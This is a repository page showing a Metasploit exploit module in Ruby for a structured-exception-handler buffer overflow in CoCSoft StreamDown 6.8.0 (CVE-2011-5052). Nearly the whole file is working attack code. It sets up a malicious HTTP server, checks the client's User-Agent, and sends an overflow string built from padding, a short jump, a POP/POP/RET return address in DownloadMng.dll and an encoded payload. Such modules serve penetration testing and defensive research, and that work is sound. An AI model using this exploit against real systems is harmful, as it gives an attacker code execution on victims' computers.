adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
154894bda6ef76d4eb2bec80e861ba94de97e4a5
metasploit-gs/modules/exploits/windows/misc/stream_down_bof.rb
T
Michael Schierl 910644400d References EDB cleanup 
All other types of references use String arguments, but approximately half
of the EDB references use Fixnums. Fix this by using Strings here too.
2012-10-23 21:02:09 +02:00

80 lines
2.1 KiB
Ruby
Raw Blame History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'CoCSoft StreamDown 6.8.0 Buffer Overflow',
'Description' => %q{
Stream Down 6.8.0 seh based buffer overflow triggered when processing
the server reponse packet.During the overflow a structured exception
handler is overwritten.
},
'Author' => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
'References' =>
[
['CVE', '2011-5052'],
['OSVDB', '78043'],
['BID', '51190'],
['URL', 'http://www.dark-masters.tk/'],
['URL', 'http://secunia.com/advisories/47343/'],
['EDB', '18283']
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0a"
},
'Platform' => 'win',
'Targets' =>
[
[
'StreamDown 6.8.0',
{
'Offset' => 16388,
'Ret' => 0x10019448 #POP/POP/RET in DownloadMng.dll
}
],
],
'DisclosureDate' => 'Dec 27 2011', # as an actual security bug
'DefaultTarget' => 0,
'License' => MSF_LICENSE
))
end
def on_request_uri(cli,request)
vprint_status("Requested: #{request.uri}")
# No point to continue if the client isn't what we interested in
ua = request.headers['User-Agent']
if ua !~ /CoCSoft Stream Download/i
print_error("Target not supported: #{ua}")
send_not_found(cli)
return
end
nseh = "\xeb\x06" + rand_text_alpha(2)
seh = [target.ret].pack('V')
offset_to_nseh = target['Offset']
nops = make_nops(10)
sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
cli.put(sploit)
close_client(cli)
end
end
Reference in New Issue View Git Blame Copy Permalink